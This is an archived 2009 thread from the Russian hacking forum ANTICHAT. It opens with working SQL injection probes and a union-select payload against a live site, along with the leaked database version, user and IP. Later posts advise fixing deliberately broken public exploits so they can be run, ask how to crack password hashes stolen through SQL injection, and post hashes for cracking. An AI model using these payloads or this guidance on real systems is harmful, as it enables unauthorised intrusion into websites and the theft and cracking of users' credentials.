ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.04.2009, 12:35
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
http://site.ru/tv/?prn&ch=1&rubrics[]=1'
есть ли тут инжект?
Код:
http://site.ru//tv/?prn&ch=1&rubrics[]=1)+order+by+1--+
http://site.ru/tv/?prn&ch=1&rubrics[]=-1)+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11--+
5.0.22-log:xmlvlru:xmlvlru@80.92.162.206:redhat-linux-gnu
Последний раз редактировалось farex; 15.04.2009 в 11:46..
Причина: по просьбе #Wolf# зетер урл..........
|
|
|
14.04.2009, 16:34
|
|
Новичок
Регистрация: 20.03.2009
Сообщений: 4
Провел на форуме:
26394
Репутация:
5
|
|
народ вот есть много эксплойтов под разны уязвимости... в общем в чем вопрос: я когда сохраняю сплойт например на перл абсолютно не изменяя его ввожу в cmd cd C:\perl\bin
perl sploit.pl
нажимаю enter вроде должен запуститься но пишет ошибку синтаксиса, хз почему, в чем может быть проблема , и так со всеми сплойтами абсолютно, переустановка компилятора не помогла
|
|
|
|
14.04.2009, 17:21
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
neverdie
Это происходит потому, что в сплоитах с паблика очень часто НАМЕРЕННО сделаны ошибки, обычно мелкие синтаксические, для того, что-бы откровенные нубы не могли им воспользоваться.
Т.е: ищи ошибку , исправляй и юзай 
PS Только не нужно сюда копипастить сплоит с просьбой найти ошибку, их не для этого там делают
|
|
|
|
14.04.2009, 17:38
|
|
Новичок
Регистрация: 20.03.2009
Сообщений: 4
Провел на форуме:
26394
Репутация:
5
|
|
хм, ну php я более менее шарю а вот перл хз, ну ошибки это подло )))) а как их находить-то если не оч разбираешься в синтаксисе это ж не html редактировать)
|
|
|
|
14.04.2009, 18:17
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от neverdie
хм, ну php я более менее шарю а вот перл хз, ну ошибки это подло )))) а как их находить-то если не оч разбираешься в синтаксисе это ж не html редактировать)
Тогда тебе не повезло, учи перл...
|
|
|
|
14.04.2009, 20:07
|
|
Новичок
Регистрация: 16.03.2009
Сообщений: 24
Провел на форуме:
62919
Репутация:
2
|
|
короче не обессудьте,
вопрос
в форум о хешах не пишу, потому как молчат там все
насколько я знаю, у mysql5 длина 40 байтов . а какая длина у mysql ?
спрашиваю потому что хеши которые я выдрал из 4 версии имеют длину 40
и второй вопрос .
есть сайт . сканирую nmap-ом, диапазон портов не задаю, т.е. должно использоваться сканир. стандартн. портов .
но сканер выдает бесконечный ряд всевозможных открытых портов, среди них есть и
2, 3, 4 , 5 - значные, короче любые . и главное , скан не заканчивается .
как мне нормально отсканировать сайт ? может в опциях указать что-нибудь
|
|
|
|
14.04.2009, 20:08
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
Здравствуйте , приятного времени суток
Достал пароль от accaunt'a (Sql-inje.. ) а он с salt.
Подскажите , где можно найти сам код salt'a , на сайте,в каких таблицах или kak он выглядит...
слышал что такое возможно )
|
|
|
|
14.04.2009, 20:24
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
насколько я знаю, у mysql5 длина 40 байтов . а какая длина у mysql ?
16
Достал пароль от accaunt'a (Sql-inje.. ) а он с salt.
Подскажите , где можно найти сам код salt'a , на сайте,в каких таблицах или kak он выглядит...
слышал что такое возможно )
Можно поточнее,от форума или откуда-нибудь ещё? И как определил что он с солью?
|
|
|
|
14.04.2009, 20:28
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
Скажите плз это реально расшифровать?
$P$BMflaNFKYKH0XoK/cqT06vW2dK4VqL1
и чем это вообще зашифровано? |
|
|
|
14.04.2009, 20:38
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
пароль от сайта
пробовал через этот сайт:
https://hashcracking.info/index.php
никаких результатов , поэтому и подумал что он с salt. 04b1abea6597fe097c29ca3aebd16584
Но проста , даже на будущее, kak узнать что это salt, где он может быть ,если это сайт или Форум.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
